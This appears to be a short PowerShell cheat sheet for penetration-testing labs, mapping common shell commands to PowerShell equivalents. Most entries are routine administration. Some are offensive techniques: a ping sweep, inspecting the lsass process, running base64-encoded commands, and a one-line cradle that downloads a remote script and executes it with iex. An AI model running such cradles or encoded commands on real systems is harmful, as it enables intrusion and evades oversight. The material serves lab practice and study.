powershell Get-ExecutionPolicy
powershell Get-Authenticode c:\temp\myscript.ps1
Specify version
powershell -Version 2
cat
powershell Get-Content C:\Windows\System32\Inetsrv\Config\administration.config
ls
powershell Get-ChildItem -Path C:\Windows\System32\Inetsrv\Config
rm
powershell Remove-Item ‘C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\test2.aspx’
tasklist
powershell Get-Process lsass | Format-List *
Grep in files
powershell Select-String -Path *.ts -Pattern "@select"
netstat
powershell Get-NetTCPConnection
netstat listening ports
powershell get-nettcpconnection | where {($_.State -eq "Listen") -and ($_.RemoteAddress -eq "0.0.0.0")}
ping sweep
powershell (1..40) | % {$ip=”192.168.0.$_”; Write-output “$IP $(test-connection -computername “$ip” -quiet -count 1)”}
base64 encoding commands (if format issues)
powershell -enc <base64encoded>
online encoder : https://raikia.com/tool-powershell-encoder/
systeminfo
powershell Get-ComputerInfo
powershell Get-Hotfix
Tail and Head
xxx | select -first 20
xxx | select -last 20
SMTP
powershell Send-MailMessage -From “ahope@rastalabs.local” -To “ahope@rastalabs.local” -Subject “Test email” -Body “This is a test email”
Download and execute script
This example is a port scanner script.
powershell –nop –c “iex(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/securethelogs/PSpanner/master/PSpanner.ps1’)”
0
Recent Comments